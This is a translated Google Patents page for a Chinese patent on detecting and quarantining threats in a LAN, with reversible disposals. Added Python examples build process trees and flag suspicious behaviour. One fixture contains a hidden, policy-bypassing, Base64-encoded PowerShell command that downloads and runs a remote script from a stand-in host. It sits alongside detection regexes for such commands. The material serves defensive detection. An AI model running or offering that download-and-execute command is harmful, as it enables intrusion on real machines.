CN106657102A - LAN based threat processing method and device - Google Patents

LAN based threat processing method and device

Info

Publication number: CN106657102A
Application number: CN201611250353.2A
Authority: CN (China)
Prior art keywords: behavior, threat, user terminal, target, task
Legal status: Pending
Other languages: Chinese (zh)
Inventors: 潘山, 孟君, 刘学忠
Current assignee: Beijing Qihoo Technology Co Ltd; Beijing Qianxin Technology Co Ltd
Original assignee: Beijing Qihoo Technology Co Ltd; Beijing Qianxin Technology Co Ltd
Application filed by Beijing Qihoo Technology Co Ltd and Beijing Qianxin Technology Co Ltd
Priority to CN201611250353.2A
Publication of CN106657102A

Classifications

    • H ELECTRICITY
    • H04 ELECTRIC COMMUNICATION TECHNIQUE
    • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00 Network architectures or network communication protocols for network security
    • H04L63/14 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1408 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
    • H04L63/1425 Traffic logging, e.g. anomaly detection
    • H04L63/1441 Countermeasures against malicious traffic
    • H04L63/145 Countermeasures against malicious traffic the attack involving the propagation of malware through the network, e.g. viruses, trojans or worms


Abstract

An embodiment of the invention provides a LAN-based threat processing method and device. The method comprises: issuing a threat disposal task to a user terminal within the LAN so that the user terminal performs a disposal operation on the threat object corresponding to the threat disposal task; and, for a target disposal operation that satisfies a preset rollback condition, issuing a disposal rollback task to the corresponding user terminal so that the user terminal rolls back the target disposal operation corresponding to the rollback task. The embodiment can detect unknown threat objects in the LAN in time and so improves the timeliness of security detection; in addition, it can correct erroneous disposals automatically, saving manual effort and raising the efficiency with which erroneous disposals are handled.

Description

A LAN-based threat processing method and apparatus
Technical field
The present invention relates to the field of computer security, and in particular to a LAN-based threat processing method and a LAN-based threat processing apparatus.
Background technology
With the rapid spread of the Internet, the local area network (LAN) has become an indispensable part of enterprise development. However, while it brings convenience to enterprises, the LAN also faces various attacks and threats, such as leakage of confidential information, data loss, network abuse, identity impersonation and illegal intrusion.
Existing LAN-based threat processing schemes mostly install antivirus client software on each terminal inside the enterprise network; the antivirus client discovers the number of viruses and their degree of harm on the terminal based on a virus signature database, and the security of the enterprise network is evaluated according to the number and harm degree of viruses on the terminals inside it.
Although this approach can to some extent reflect the security state of the enterprise network in terms of virus count and harm degree, the virus signature database lags behind the viruses themselves. An enterprise network in which viruses are found is already compromised, i.e. it is already a failed network environment, and scoring or detecting a failed environment is after-the-fact; the security of the enterprise network therefore cannot be effectively guaranteed.
Summary of the invention
In view of the above problems, the present invention is proposed to provide a LAN-based threat processing method and a LAN-based threat processing apparatus that overcome the above problems or at least partially solve them.
According to one aspect of the present invention, a LAN-based threat processing method applied to a server is provided, comprising:
issuing a threat disposal task to a user terminal in the LAN so that the user terminal performs a disposal operation on the threat object corresponding to the threat disposal task; and
for a target disposal operation that satisfies a preset rollback condition, issuing a disposal rollback task to the corresponding user terminal so that the user terminal rolls back the target disposal operation corresponding to the disposal rollback task.
According to another aspect of the present invention, a LAN-based threat processing method applied to a user terminal is provided, comprising:
receiving a threat disposal task issued by a server;
performing a disposal operation on the threat object corresponding to the threat disposal task;
receiving a disposal rollback task issued by the server for a target disposal operation that satisfies a preset rollback condition; and
rolling back the target disposal operation corresponding to the disposal rollback task.
According to a further aspect of the present invention, a LAN-based threat processing apparatus applied to a server is provided, comprising:
a first task issuing module, configured to issue a threat disposal task to a user terminal in the LAN so that the user terminal performs a disposal operation on the threat object corresponding to the threat disposal task; and
a second task issuing module, configured to issue, for a target disposal operation that satisfies a preset rollback condition, a disposal rollback task to the corresponding user terminal so that the user terminal rolls back the target disposal operation corresponding to the disposal rollback task.
According to yet another aspect of the present invention, a LAN-based threat processing apparatus applied to a user terminal is provided, comprising:
a first receiving module, configured to receive a threat disposal task issued by a server;
a disposal operation module, configured to perform a disposal operation on the threat object corresponding to the threat disposal task;
a second receiving module, configured to receive a disposal rollback task issued by the server for a target disposal operation that satisfies a preset rollback condition; and
a disposal rollback module, configured to roll back the target disposal operation corresponding to the disposal rollback task.
The LAN-based threat processing method and apparatus of embodiments of the present invention can detect threat objects within the LAN and issue threat disposal tasks to user terminals in the LAN, so that the user terminals perform disposal operations on the corresponding threat objects. Because a threat object is an object that exists in the operating system and poses a threat, its detection is not limited by the lag of a virus signature database behind the viruses themselves; embodiments of the present invention can therefore detect unknown threat objects in the LAN more promptly, improving the timeliness of security detection and enabling effective prevention of viruses.
Furthermore, to address the manual effort consumed in correcting erroneous disposals of threat objects, embodiments of the present invention issue, for a target disposal operation that satisfies a preset rollback condition, a disposal rollback task to the corresponding user terminal so that the user terminal rolls back that target disposal operation. Since the object of the rollback is the disposal operation itself, erroneous disposals can be resolved automatically while saving manual effort, i.e. the efficiency of handling erroneous disposals is improved.
The above is only an overview of the technical solution of the present invention. In order that the technical means of the present invention may be better understood and practised according to the content of the specification, and that the above and other objects, features and advantages of the present invention may become more apparent, specific embodiments of the present invention are set out below.
Brief description of the drawings
Various other advantages and benefits will become clear to those of ordinary skill in the art from reading the following detailed description of the optional embodiments. The drawings serve only to illustrate the optional embodiments and are not to be considered limiting of the present invention. Throughout the drawings, the same reference numerals denote the same parts. In the drawings:
Fig. 1 is a flow chart of the steps of a LAN-based threat processing method according to an embodiment of the present invention;
Fig. 2 is a flow chart of the steps of a LAN-based threat processing method according to an embodiment of the present invention;
Fig. 3 is a schematic diagram of the structure of a process tree according to the present invention;
Fig. 4 is a flow chart of the steps of a LAN-based threat processing method according to an embodiment of the present invention;
Fig. 5 is a flow chart of the steps of a LAN-based threat processing method according to an embodiment of the present invention;
Fig. 6 is a flow chart of the steps of a LAN-based threat processing method according to an embodiment of the present invention;
Fig. 7 is a schematic diagram of the structure of a LAN-based threat processing apparatus according to an embodiment of the present invention; and
Fig. 8 is a schematic diagram of the structure of a LAN-based threat processing apparatus according to an embodiment of the present invention.
Specific embodiments
Exemplary embodiments of the present disclosure are described more fully below with reference to the accompanying drawings. Although the drawings show exemplary embodiments of the disclosure, it should be understood that the disclosure may be realized in various forms and should not be limited by the embodiments set forth here. Rather, these embodiments are provided so that the disclosure will be understood more thoroughly and its scope conveyed completely to those skilled in the art.
Embodiments of the present invention can detect threat objects in the LAN and issue threat disposal tasks to user terminals in the LAN, so that a user terminal performs a disposal operation on the threat object corresponding to the task. A threat object may be a system object that poses a threat or a non-system object that poses a threat. A system object may be, for example, a process, and the corresponding disposal operation may be placing the threatening process into an isolated area (quarantine). A non-system object may be, for example, a URL (Uniform Resource Locator) access behavior, an IP (Internet Protocol) access, a port access, a DNS (Domain Name System) access, an email address or an email attachment, and the corresponding disposal operations include: blocking the threatening URL, IP or DNS through a firewall rule, blocking a given email address at the mail server, and stripping the threatening attachment at the mail server. It will be appreciated that embodiments of the present invention do not limit the specific threat objects or their disposal operations.
The inventors found in the practice of the invention that imperfect threat-object detection easily produces false positives (an object that poses no threat is taken as a threat object), and that administrator error can cause the same; either leads to erroneous disposal of the threat object, for example isolating a process that poses no threat. When erroneous disposals are corrected manually, considerable manual effort is consumed and the efficiency of correction is low.
To improve the efficiency of correcting erroneous disposals, embodiments of the present invention issue, for a target disposal operation that satisfies a preset rollback condition, a disposal rollback task to the corresponding user terminal so that the user terminal rolls back that target disposal operation. Since the object of the rollback is the disposal operation, erroneous disposals can be resolved automatically while saving manual effort.
Referring to Fig. 1, a flow chart of the steps of a LAN-based threat processing method according to an embodiment of the present invention is shown; the method is applied to a server and may specifically comprise the following steps:
Step 101: issue a threat disposal task to a user terminal in the LAN so that the user terminal performs a disposal operation on the threat object corresponding to the threat disposal task;
Step 102: for a target disposal operation that satisfies a preset rollback condition, issue a disposal rollback task to the corresponding user terminal so that the user terminal rolls back the target disposal operation corresponding to the disposal rollback task.
Embodiments of the present invention can be applied to LANs such as enterprise networks, government networks and campus networks. In such a LAN, the server is the device that controls the other terminals in the LAN to perform security detection, and a user terminal is a terminal in the LAN that responds to the server's control instructions and exchanges data with the server. In practice, a server agent module can be deployed on the server and a software client module on the user terminals, in a client/server (C/S) architecture, to implement the LAN server's control of the user terminals and the user terminals' response and communication functions. The server and user terminals may communicate over a standard protocol or a proprietary protocol; a proprietary protocol is described as having the advantages of being closed and secure, although in practice the task channel still needs authentication and encryption, since a forged task could quarantine or restore arbitrary objects on a terminal. It will be appreciated that embodiments of the present invention do not limit the specific communication mode between server and user terminal.
In practice, the user of the server may be an advanced user with some network security knowledge, such as a network administrator, and can therefore set corresponding control instructions flexibly according to the current security requirements and actual situation of the LAN. The threat disposal task and the disposal rollback task may each be provided by a corresponding control instruction.
In an optional embodiment of the present invention, the information of the threat disposal task may include: information about the threat object (such as the path of the threat object on the user terminal and a file feature of the threat object such as its MD5) and information about the disposal operation. The threat object information allows the user terminal to locate the threat object, and the disposal operation information tells the user terminal which disposal operation to perform. It will be appreciated that embodiments of the present invention do not limit the specific information of the threat disposal task.
In practice, for a threat disposal task issued by an administrator, the corresponding disposal operation can normally be rolled back as long as the sample of the threat object has not yet been deleted. For convenience, embodiments of the present invention denote the disposal operations that need to be rolled back as target disposal operations satisfying a preset rollback condition. Target disposal operations may include erroneous disposal operations caused by threat-object false positives, administrator error and the like; it will be appreciated that the administrator can preset the target disposal operations, and that embodiments of the present invention do not limit the specific target disposal operations.
In another optional embodiment of the present invention, the information of the disposal rollback task may include information about the threat object, information about the target disposal operation, or information about the threat disposal task, so that the user terminal can locate the target disposal operation. It will be appreciated that embodiments of the present invention do not limit the specific information of the disposal rollback task.
In an application example of the present invention, if the target disposal operation is isolating a threatening process, the corresponding rollback restores that process from the isolated area; if the target disposal operation is blocking a threatening URL, IP or DNS through a firewall rule, the corresponding rollback removes that URL, IP or DNS from the firewall rules. Embodiments of the present invention do not limit the specific rollback operation.
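The disposal task and rollback task exchange of steps 101 and 102, as an added example that is not code from the patent or its assignees. It assumes a file-based threat object, "quarantine" as moving the file into an isolated directory, direct method calls in place of the server/client protocol, and that the preset rollback condition is an operator marking the disposal as a false positive or an administrator error; the sample file is constructed in a temporary directory.

```python
import hashlib
import os
import shutil
import tempfile
from dataclasses import dataclass, field

# Preset rollback conditions (assumption): anything else is refused.
ROLLBACK_CONDITIONS = {"false_positive", "admin_error"}


def md5_of(path):
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


@dataclass
class Task:
    kind: str          # "dispose" or "rollback"
    task_id: str
    object_path: str   # threat object path on the user terminal
    object_md5: str    # file feature of the threat object
    operation: str     # disposal operation; only "quarantine" is modelled


@dataclass
class UserTerminal:
    quarantine_dir: str                            # the "isolated area"
    disposals: dict = field(default_factory=dict)  # task_id -> (original, quarantined)

    def handle(self, task):
        if task.kind == "dispose":
            return self._dispose(task)
        if task.kind == "rollback":
            return self._rollback(task)
        return "unknown_task_kind"

    def _dispose(self, task):
        # Locate the object by path and verify its MD5, so a stale task does
        # not quarantine a file that has since been replaced.
        if not os.path.isfile(task.object_path) or md5_of(task.object_path) != task.object_md5:
            return "object_not_found"
        if task.operation != "quarantine":
            return "unsupported_operation"
        dest = os.path.join(self.quarantine_dir, task.task_id)
        shutil.move(task.object_path, dest)
        self.disposals[task.task_id] = (task.object_path, dest)   # needed for rollback
        return "disposed"

    def _rollback(self, task):
        entry = self.disposals.pop(task.task_id, None)
        if entry is None:
            # never disposed, already rolled back, or sample deleted from quarantine
            return "no_such_disposal"
        original, dest = entry
        shutil.move(dest, original)
        return "rolled_back"


class Server:
    def __init__(self):
        self.issued = {}   # task_id -> Task, so a rollback can reference it

    def issue_dispose(self, terminal, task_id, path, md5):
        task = Task("dispose", task_id, path, md5, "quarantine")
        self.issued[task_id] = task
        return terminal.handle(task)

    def issue_rollback(self, terminal, task_id, reason):
        if reason not in ROLLBACK_CONDITIONS:
            return "rollback_condition_not_met"
        task = self.issued.get(task_id)
        if task is None:
            return "unknown_task"
        return terminal.handle(Task("rollback", task_id, task.object_path,
                                    task.object_md5, task.operation))


def demo():
    """Quarantine a constructed, benign file by mistake, then roll it back."""
    root = tempfile.mkdtemp(prefix="lan_threat_")
    quarantine = os.path.join(root, "quarantine")
    os.mkdir(quarantine)
    sample = os.path.join(root, "report.docm")
    with open(sample, "wb") as f:
        f.write(b"constructed sample content\n")
    term, srv = UserTerminal(quarantine), Server()
    out = [
        srv.issue_dispose(term, "task-1", sample, md5_of(sample)),
        os.path.exists(sample),                                 # False: quarantined
        srv.issue_rollback(term, "task-1", "user_complaint"),   # not a preset condition
        srv.issue_rollback(term, "task-1", "false_positive"),
        os.path.exists(sample),                                 # True: restored
        srv.issue_rollback(term, "task-1", "false_positive"),   # nothing left to roll back
        srv.issue_dispose(term, "task-2", sample, "0" * 32),    # stale feature: refused
    ]
    shutil.rmtree(root)
    return out


if __name__ == "__main__":
    print(demo())
```

The terminal keeps its own record of completed disposals keyed by task id, which is what lets a later rollback task locate the target disposal operation; the MD5 check on disposal is the reason the task carries a file feature and not only a path.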
Referring to Fig. 2, a flow chart of the steps of a LAN-based threat processing method according to an embodiment of the present invention is shown; the method is applied to a server, can be used to detect threat objects, and may specifically comprise the following steps:
Step 201: receive process behaviors reported by a user terminal in the LAN;
Step 202: according to the process behaviors, establish the process trees of the user terminal at different moments and the mapping relations between each process in the process tree and its process behaviors;
Step 203: obtain from the process tree a target process that satisfies a preset process behavior pattern;
Step 204: judge, according to the process behaviors of the target process, whether the target process is a threat object.
In embodiments of the present invention, the process tree serves as the basis for detecting malicious objects: by analysing the process trees at different moments, the process subtrees that exhibit malicious behavior can be obtained, and information such as the path and file feature of the malicious object on the user terminal can be determined.
A first control instruction may instruct the user terminal to report process behaviors to the server; after receiving the first control instruction, the user terminal monitors the process behaviors of its local processes and reports the monitored process behaviors to the server. Optionally, the user terminal can capture and report process behaviors without affecting the user's normal use of the terminal, so that the user experience is not affected.
Optionally, the process behaviors may include, but are not limited to, at least one of: process start/stop behavior, memory behavior and change behavior. Memory behavior may include process injection behavior, file access behavior and network connection behavior; network connection behavior may include at least one of URL access, IP access, port access and DNS access. Change behavior may include system change behavior (creation, deletion and modification of registry entries), account change behavior (creation of accounts, change of account permissions) and document change behavior. It will be appreciated that embodiments of the present invention do not limit the specific process behaviors.
After receiving the process behaviors reported by each user terminal, the server can record the information of the received process behaviors. Optionally, the information of a process behavior may include, but is not limited to, fields such as the process information and the execution parameters of the process behavior.
In embodiments of the present invention, a process tree represents the relations between processes on a user terminal and generally consists of parent processes and child processes: once a program's process runs, it may create or call other processes, which together form a process tree. Referring to Fig. 3, a schematic diagram of the structure of a process tree according to the present invention is shown, in which child nodes B and C of node A are child processes created or called by node A; node B and node C, as parent processes, in turn create or call their own child processes D and E, and F and G, respectively. The information of each process in the process tree may include the process name, the feature value of the program corresponding to the process, the parent process of the process and so on; it will be appreciated that embodiments of the present invention do not limit the specific information of each process in the process tree. In practice, the name of a node in the process tree may or may not be the same as the process name of the corresponding process; embodiments of the present invention are described mainly with the example in which they are the same.
In an optional embodiment of the present invention, the process trees of the user terminal at different moments can be established according to the process start/stop behaviors included in the process behaviors. Optionally, process start/stop behavior may include the start time and stop time of each process and the processes it created or called, so that each node of the process tree can be obtained from the process start/stop behaviors. For example, suppose the start times of process A, process B and process C are moment 1, moment 2 and moment 3 respectively; if process A is the first process in the system, the root node A of the process tree is obtained; if process A created or called process B and process C, child nodes B and C of root node A are obtained, and following this flow the process tree shown in Fig. 3 can be obtained. It should be noted that the process tree changes as process start/stop behaviors change, so the process trees of the user terminal at different moments can be obtained; moreover, by comparing the process trees at earlier and later moments, the change in process start/stop behavior can be obtained.
In another optional embodiment of the present invention, the method of this embodiment may further comprise: receiving a system snapshot of a certain moment reported by the user terminal; step 202 of establishing the process trees of the user terminal at different moments according to the process behaviors may then comprise: establishing, on the basis of the system snapshot and according to the process behaviors, the process trees of the user terminal at different moments. In embodiments of the present invention, a system snapshot can represent the system state of the user terminal at a moment T, which may include the processes present at moment T and their behaviors, the registry, files and so on; the system snapshot can be regarded as including the process tree at moment T. Establishing the process trees at different moments on the basis of the system snapshot can therefore reduce the amount of computation required and improve the efficiency of establishing the process tree.
In yet another optional embodiment of the present invention, the system snapshot may be the system state of the user terminal at a first moment T1 and the process behaviors may include process start/stop behaviors; establishing the process trees of the user terminal at different moments on the basis of the system snapshot and according to the process behaviors may then comprise: obtaining the process tree of the user terminal at a second moment T2 according to the process start/stop behaviors after the first moment T1. T2 is later than T1, i.e. nodes can be added to or deleted from process tree 1 corresponding to the system snapshot to obtain the process tree at moment T2. Optionally, T1 may be any moment after operating system startup has completed; for example, if the moment at which operating system startup completes is T0, T1 is the moment following T0. Of course, embodiments of the present invention do not limit the specific T1.
In an optional embodiment of the present invention, the process behaviors may include process start/stop behaviors and/or memory behaviors and/or change behaviors, i.e. the series of behaviors produced after a process starts; step 202 of establishing the mapping relations between each process in the process tree and its process behaviors according to the process behaviors may then comprise: establishing, for each process in the process tree, the mapping relation between that process and its process start/stop behaviors and/or memory behaviors and/or change behaviors.
After step 202 has established the process trees of the user terminal at different moments and the mapping relations between each process in the process tree and its process behaviors, step 203 can obtain from the process tree a target process that satisfies a preset process behavior pattern.
A preset behavior pattern can represent a suspicious or malicious pattern of process behavior; in practice, those skilled in the art can determine any preset behavior pattern required by the application. In an optional embodiment of the present invention, the preset behavior pattern may be a document-associated process starting a non-operating-system process, for example the winword process starting a non-Microsoft child process, where winword is a document-associated process. In another optional embodiment of the present invention, the preset behavior pattern may be a process accessing and encrypting a second file after changing a first file in the file system; for example, a process that modifies the MFT (the NTFS Master File Table) and then quickly accesses office documents. This preset behavior pattern belongs to the behavior of ransomware: the malicious process first deletes the file records in the MFT so that the files cannot be recovered, then searches for documents and encrypts them.
In practice, each process in the process tree can be traversed; for the current process obtained by traversal, the corresponding current process behaviors are obtained from the above mapping relations, and it is judged whether the current behavior pattern satisfies the preset behavior pattern. It will be appreciated that embodiments of the present invention do not limit the specific procedure for obtaining from the process tree a target process that satisfies the preset process behavior pattern.
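Steps 201 to 203 carried through on a constructed behavior report, as an added example that is not code from the patent or its assignees. It assumes the event layout shown, a "signer" field on start events standing in for the "non-Microsoft" test, and the two pattern definitions below (the ".locked" suffix stands in for the encrypted output); the events are constructed, not captured telemetry.

```python
from dataclasses import dataclass, field
from typing import Optional

DOC_PROCS = {"winword.exe", "excel.exe", "powerpnt.exe"}     # document-associated processes
OFFICE_EXT = (".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx")


@dataclass
class Proc:
    pid: int
    ppid: int
    name: str
    signer: str                     # assumed field: code-signing publisher
    start: int
    stop: Optional[int] = None
    behaviors: list = field(default_factory=list)   # (time, kind, detail)
    children: list = field(default_factory=list)


class ProcessTree:
    """Server-side process tree for one user terminal, built from the
    reported process behaviors (step 202)."""

    def __init__(self):
        self.procs = {}

    def ingest(self, ev):
        kind = ev["kind"]
        if kind == "start":
            p = Proc(ev["pid"], ev["ppid"], ev["name"].lower(), ev["signer"], ev["t"])
            self.procs[p.pid] = p
            parent = self.procs.get(p.ppid)
            if parent is not None:
                parent.children.append(p)          # created/called relation
        elif kind == "stop":
            self.procs[ev["pid"]].stop = ev["t"]
        else:
            # memory/change behaviors are mapped to the process that produced them
            self.procs[ev["pid"]].behaviors.append((ev["t"], kind, ev["detail"]))

    def alive_at(self, t):
        """The process tree at moment t: started by t and not yet stopped."""
        return {p.pid for p in self.procs.values()
                if p.start <= t and (p.stop is None or p.stop > t)}

    def render(self):
        """Indented listing in the style of Fig. 3."""
        lines = []

        def walk(p, depth):
            lines.append("  " * depth + f"{p.name} ({p.pid})")
            for c in p.children:
                walk(c, depth + 1)

        for p in self.procs.values():
            if p.ppid not in self.procs:            # root: parent never reported
                walk(p, 0)
        return lines


# Preset behavior patterns (step 203): each takes a Proc and returns a bool.
def doc_spawns_foreign(p):
    """Document process started a child that is not signed by Microsoft."""
    return p.name in DOC_PROCS and any(c.signer != "Microsoft" for c in p.children)


def mft_then_encrypt(p):
    """Writes to the MFT, then reads an office document, then writes an
    encrypted copy; '.locked' stands in for the encrypted output (assumption)."""
    tampered = read_doc = False
    for _, kind, detail in sorted(p.behaviors):    # time order
        d = detail.lower()
        if kind == "file_write" and "$mft" in d:
            tampered = True
        elif tampered and kind == "file_access" and d.endswith(OFFICE_EXT):
            read_doc = True
        elif read_doc and kind == "file_write" and d.endswith(".locked"):
            return True
    return False


PATTERNS = {"doc_spawns_foreign": doc_spawns_foreign,
            "mft_then_encrypt": mft_then_encrypt}


def find_targets(tree, patterns=PATTERNS):
    """Traverse every process and return (pid, pattern) for each match."""
    return [(p.pid, name) for p in tree.procs.values()
            for name, fn in patterns.items() if fn(p)]


# Constructed behavior report from one terminal (not real telemetry).
EVENTS = [
    {"kind": "start", "t": 1, "pid": 4, "ppid": 0, "name": "explorer.exe", "signer": "Microsoft"},
    {"kind": "start", "t": 2, "pid": 100, "ppid": 4, "name": "WINWORD.EXE", "signer": "Microsoft"},
    {"kind": "start", "t": 4, "pid": 102, "ppid": 100, "name": "updater.exe", "signer": "unknown"},
    {"kind": "file_write", "t": 5, "pid": 102, "detail": r"\\.\C:$MFT"},
    {"kind": "file_access", "t": 6, "pid": 102, "detail": r"C:\Users\a\Documents\q1.docx"},
    {"kind": "file_write", "t": 7, "pid": 102, "detail": r"C:\Users\a\Documents\q1.docx.locked"},
    {"kind": "stop", "t": 8, "pid": 100},
]


def build(events=EVENTS):
    tree = ProcessTree()
    for ev in events:
        tree.ingest(ev)
    return tree


if __name__ == "__main__":
    t = build()
    print("\n".join(t.render()))
    print(find_targets(t))
```

The tree keeps stopped processes so that `alive_at()` can answer for any moment and so that a parent that has already exited (winword here) still explains where its child came from; a pattern over the parent/child relation and a pattern over a process's own ordered behaviors are both just functions over the same structure.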
The process behavior of the target process that step 204 can be obtained according to step 203, judges that whether the target process is Threat object.
The embodiment of the present invention can provide the process behavior according to the target process, judge that whether the target process is The following detection mode of threat object;
Detection mode 1, corresponding warning information is sent for the target process, so that administrator is directed to the announcement Alarming information, according to the process behavior of the target process, judges whether the target process is threat object;And/or
Detection mode 2, using descendants's process of the target process or the target process as process to be analyzed, according to According to the execution parameter of the process behavior of the process to be analyzed, judge whether the target process is threat object.
Wherein, detection mode 1 can send corresponding warning information for the target process, so that administrator connects The warning information is received, and the security of target process is detected by manual type.For example, can be by manual type to process Behavior is analyzed, and judges the security of target process according to analysis result, and corresponding analysis process can include:Behavior row For the specific fields such as execution parameter exclusion and statistical operation etc..
Detection mode 2 can be using descendants's process of the target process or the target process as process to be analyzed, then The execution parameter of the process behavior of the process to be analyzed may indicate that target process performs which behavior that generates, or mesh Which behavior is descendants's process of mark process generate, as such, it is possible to whether judge the target process according to above-mentioned execution parameter For threat object.
In an optional embodiment of the present invention, the step of judging, according to the execution parameters of the process behavior of the process to be analyzed, whether the target process is a threat object may include:
if a command-line script environment parameter contained in the execution parameters involves script encoding behavior (the original text calls this script encryption; the PowerShell parameter in question takes a Base64-encoded, not encrypted, command), the security detection result for the target process is unsafe; and/or
if a policy exclusion parameter contained in the execution parameters involves behavior that bypasses the execution restriction policy, the security detection result for the target process is unsafe.
powershell is one example of a command-line script environment parameter: if the run parameters of powershell include a parameter such as enc (short for EncodedCommand), which indicates script encoding behavior, the security detection result for the target process can be regarded as unsafe.
Excludepolicy is one example of a policy exclusion parameter (Excludepolicy is the name used in the original; the corresponding PowerShell parameter is -ExecutionPolicy, for example -ExecutionPolicy Bypass). If it involves behavior that bypasses the execution restriction policy, the security detection result of the target process can be regarded as unsafe. The execution restriction policy is a group policy which, when enabled in restricted mode, prevents commands from being executed through powershell; however, there are many ways to bypass the execution restriction policy, which gives malicious processes an opportunity. Note that Microsoft documents the execution policy as a safety feature for users rather than a security boundary, which is why a bypass is an indicator to be weighed with the rest of the process behavior rather than proof of malice on its own. In the process of judging whether the target process is a threat object according to the execution parameters to be analyzed of the process behavior of the process to be analyzed, the embodiment of the present invention can execute those parameters with the execution restriction policy enabled; if they execute successfully, corresponding information can be emitted, and the embodiment can capture that information through an EDR (Endpoint Detection and Response) component. If the capture succeeds, the policy exclusion parameter is regarded as involving behavior that bypasses the execution restriction policy, and the security detection result of the target process is in turn regarded as unsafe.
It will be understood that the detection procedures above, in which the command-line script environment parameter contained in the execution parameters involves script encoding behavior and the policy exclusion parameter contained in the execution parameters involves bypassing the execution restriction policy, are only optional embodiments of the present invention; in practice, those skilled in the art may detect other behaviors contained in the execution parameters according to practical application requirements, and the embodiment of the present invention does not limit the specific procedure for judging, according to the execution parameters of the process behavior of the process to be analyzed, whether the target process is a threat object. In addition, it will be understood that in the embodiment of the present invention the security detection result of the target process may also be: safe.
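The following is an added worked example, not code from the patent or its assignees, showing the server-side half of detection mode 2 end to end: a process tree is replayed from a startup snapshot plus reported start/stop behaviors (the construction of steps 603 to 606 of Fig. 6), each process is mapped to its behaviors, target processes are selected with an assumed preset pattern (an Office process whose subtree contains a script host), and the command lines of the target and its descendants are inspected for an encoded command (-enc and its accepted short forms) and an execution policy bypass. The snapshot, behavior records, process names, the preset pattern and the payload are all constructed for illustration.

```python
import base64
import re
from collections import defaultdict

# Constructed system snapshot (step 601): processes alive when the agent started reporting.
SNAPSHOT = {
    4:   {"name": "System",       "ppid": 0, "cmdline": "System"},
    612: {"name": "explorer.exe", "ppid": 4, "cmdline": "explorer.exe"},
}

def _encode_ps(script: str) -> str:
    # -EncodedCommand takes Base64 of the UTF-16LE script: encoding, not encryption.
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
PS_CMD = "powershell -ep bypass -w hidden -enc " + _encode_ps(PAYLOAD)

# Constructed process behaviors as one terminal would report them after the snapshot:
# (time, pid, behavior kind, details). Kinds follow the patent: start/stop, memory, change.
BEHAVIORS = [
    (1, 900, "start",  {"ppid": 612, "name": "WINWORD.EXE", "cmdline": "WINWORD.EXE /n order.docm"}),
    (2, 901, "start",  {"ppid": 900, "name": "cmd.exe", "cmdline": "cmd.exe /c " + PS_CMD}),
    (3, 902, "start",  {"ppid": 901, "name": "powershell.exe", "cmdline": PS_CMD}),
    (4, 902, "memory", {"op": "VirtualAllocEx", "target_pid": 612}),
    (5, 901, "stop",   {}),
    (6, 950, "start",  {"ppid": 612, "name": "notepad.exe", "cmdline": "notepad.exe"}),
]

def build_process_tree(snapshot, behaviors):
    """Steps 603/604: replay start/stop behaviors over the snapshot; map every pid to its behaviors."""
    procs = {pid: dict(info, alive=True, children=[]) for pid, info in snapshot.items()}
    for pid, p in procs.items():
        if p["ppid"] in procs:
            procs[p["ppid"]]["children"].append(pid)
    behaviors_by_pid = defaultdict(list)
    for t, pid, kind, d in sorted(behaviors, key=lambda b: b[0]):
        if kind == "start":
            procs[pid] = dict(d, alive=True, children=[])
            if d["ppid"] in procs:
                procs[d["ppid"]]["children"].append(pid)
        elif kind == "stop" and pid in procs:
            procs[pid]["alive"] = False   # keep exited processes so the lineage survives
        behaviors_by_pid[pid].append((t, kind, d))
    return procs, behaviors_by_pid

def descendants(procs, pid):
    stack, out = list(procs[pid]["children"]), []
    while stack:
        c = stack.pop()
        out.append(c)
        stack.extend(procs[c]["children"])
    return sorted(out)

OFFICE = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

def find_targets(procs):
    """Step 605 with an assumed preset pattern: an Office process whose subtree holds a script host."""
    return [pid for pid, p in procs.items()
            if p["name"].upper() in OFFICE
            and any(procs[c]["name"].lower() in SCRIPT_HOSTS for c in descendants(procs, pid))]

# PowerShell accepts unambiguous prefixes of parameter names, so the short forms are matched too.
ENC_RE = re.compile(r"(?i)(?<!\S)-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]{16,})")
POLICY_RE = re.compile(r"(?i)(?<!\S)-(?:executionpolicy|exec|ex|ep)\s+(bypass|unrestricted)")

def check_execution_parameters(cmdline):
    """Indicators from one command line: encoded script (decoded for the analyst) and policy bypass."""
    findings = {}
    m = ENC_RE.search(cmdline)
    if m:
        try:
            findings["encoded_command"] = base64.b64decode(m.group(1)).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            findings["encoded_command"] = "<undecodable>"
    m = POLICY_RE.search(cmdline)
    if m:
        findings["execution_policy"] = m.group(1).lower()
    return findings

def judge_target(procs, pid):
    """Step 606, detection mode 2: inspect the target and its descendants; unsafe if any indicator hits."""
    report = {}
    for p in [pid] + descendants(procs, pid):
        found = check_execution_parameters(procs[p].get("cmdline", ""))
        if found:
            report[p] = found
    return ("unsafe" if report else "safe"), report

if __name__ == "__main__":
    procs, by_pid = build_process_tree(SNAPSHOT, BEHAVIORS)
    for pid in find_targets(procs):
        verdict, report = judge_target(procs, pid)
        print(pid, procs[pid]["name"], verdict, report)
```

Exited processes stay in the tree with alive set to False; if they were dropped on the stop behavior, the cmd.exe hop between WINWORD.EXE and powershell.exe in the sample would vanish and the Office-to-script-host pattern would no longer match. Decoding the encoded command is what lets the analyst see the download cradle instead of an opaque Base64 blob.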
In summary, the LAN-based threat processing method of the embodiment of the present invention can detect threat objects in the LAN and issue a threat disposal task to a user terminal in the LAN, so that the user terminal performs a disposal operation on the threat object corresponding to the threat disposal task. Because a threat object is an object in the operating system that presents a threat, its detection is not limited by a virus signature library, whose coverage necessarily lags behind new viruses; the embodiment of the present invention can therefore detect unknown threat objects in the LAN more promptly, improving the timeliness of security detection and enabling effective prevention of viruses.
